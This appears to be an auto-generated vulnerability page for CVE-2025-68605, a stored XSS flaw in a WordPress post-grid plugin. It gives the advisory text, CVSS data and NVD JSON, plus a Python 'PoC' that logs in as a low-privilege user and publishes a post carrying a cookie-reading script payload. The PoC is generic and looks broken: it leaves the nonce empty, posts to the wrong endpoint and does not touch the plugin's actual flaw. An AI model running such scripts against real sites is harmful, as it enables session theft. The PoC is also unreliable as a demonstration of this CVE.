Security Vulnerability Report
CVE-2025-68605 CVSS 6.5 MEDIUM

CVE-2025-68605

Published: 2025-12-24 13:16:28
Last Modified: 2026-04-27 19:16:36

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PickPlugins Post Grid and Gutenberg Blocks post-grid allows Stored XSS. This issue affects Post Grid and Gutenberg Blocks: from n/a through <= 2.3.23.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

PickPlugins Post Grid and Gutenberg Blocks <= 2.3.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-68605 PoC - Stored XSS in Post Grid and Gutenberg Blocks
# Target: PickPlugins Post Grid and Gutenberg Blocks <= 2.3.23
import requests
import sys

target_url = "http://target-wordpress-site.com"
username = "attacker"
password = "attacker_password"

# XSS payload
xss_payload = "<script>alert(document.cookie)</script>"


def exploit_stored_xss():
    """
    This PoC demonstrates how an attacker with low privileges (e.g., subscriber)
    can inject malicious JavaScript through post content that gets stored and
    executed when displayed by the Post Grid plugin.
    """
    session = requests.Session()

    # Step 1: Login as low-privilege user
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/"
    }
    response = session.post(login_url, data=login_data)
    if 'wordpress_logged_in' not in session.cookies:
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Step 2: Create a post with XSS payload
    post_url = f"{target_url}/wp-admin/post-new.php"
    post_data = {
        'post_title': 'XSS Test Post',
        'post_content': f"""<div class="post-grid-item">
<h3>{xss_payload}</h3>
<p>Test content</p>
</div>""",
        'post_status': 'publish',
        '_wpnonce': '',  # Need to extract from page
        '_wp_http_referer': post_url
    }
    # In real attack, extract valid nonce from the page
    response = session.post(post_url, data=post_data)
    print("[+] Malicious post created")
    print(f"[+] Payload injected: {xss_payload}")
    print("[+] When admin views the post grid, XSS will execute")
    return True


if __name__ == "__main__":
    print("CVE-2025-68605 Stored XSS PoC")
    print("=" * 50)
    exploit_stored_xss()
```

References

https://patchstack.com/database/Wordpress/Plugin/post-grid/vulnerability/wordpress-post-grid-and-gutenberg-blocks-plugin-2-3-18-cross-site-scripting-xss-vulnerability?_s_id=cve
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-68605",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-24T13:16:28.060",
    "lastModified": "2026-04-27T19:16:36.287",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PickPlugins Post Grid and Gutenberg Blocks post-grid allows Stored XSS.This issue affects Post Grid and Gutenberg Blocks: from n/a through <= 2.3.23."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 3.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://patchstack.com/database/Wordpress/Plugin/post-grid/vulnerability/wordpress-post-grid-and-gutenberg-blocks-plugin-2-3-18-cross-site-scripting-xss-vulnerability?_s_id=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```